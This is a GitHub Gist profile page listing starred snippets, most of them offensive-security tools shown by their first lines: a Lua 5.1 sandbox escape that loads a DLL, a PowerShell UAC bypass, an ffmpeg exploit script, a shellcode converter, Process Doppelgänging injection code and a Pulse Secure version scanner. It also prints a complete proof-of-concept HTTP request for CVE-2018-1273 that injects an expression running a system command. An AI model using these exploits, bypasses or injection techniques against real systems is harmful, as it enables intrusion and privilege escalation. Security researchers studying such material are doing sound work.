Skip to content

Instantly share code, notes, and snippets.

View Tom4t0's full-sized avatar

Tomato Tom4t0

299 followers · 44 following
View GitHub Profile
@corsix
corsix / Exploiting Lua 5.1 on 32-bit Windows.md
Created September 16, 2013 00:20

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
@mattifestation
mattifestation / UACBypass.ps1
Last active March 27, 2024 03:27
function Invoke-UACBypass {
<#
.SYNOPSIS
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
@PaulCher
PaulCher / exploit_ffmpeg.py
Last active May 4, 2023 18:46
#!/usr/bin/python
import re
import os
import sys
import socket
import threading
from time import sleep
from pwn import *
@phith0n
phith0n / README.md
Last active May 1, 2020 13:43
一个基于redis-py的bloom filter算法实现,哈希算法:MurmurHash。用于海量数据的去重。
@carnal0wnage
carnal0wnage / DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Last active September 26, 2022 06:00
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
@rvrsh3ll
rvrsh3ll / ConvertShellcode.py
Last active February 18, 2024 20:22
import binascii
import sys
file_name = sys.argv[1]
with open (file_name) as f:
hexdata = binascii.hexlify(f.read())
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
shellcode = ''
for i in hexlist:
shellcode += "0x{},".format(i)
@FrankSpierings
FrankSpierings / README.md
Last active January 20, 2024 20:45
Linux Container Escapes and Hardening
@hfiref0x
hfiref0x / inject.c
Last active May 31, 2023 16:23
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@matthiaskaiser
matthiaskaiser / CVE-2018-1273.http
Created April 12, 2018 08:35
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@rxwx
rxwx / pulseversion.py
Created August 13, 2019 09:04
Pulse Secure Version Scanner
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python pulseversion.py <target ip/domain>"
sys.exit(1)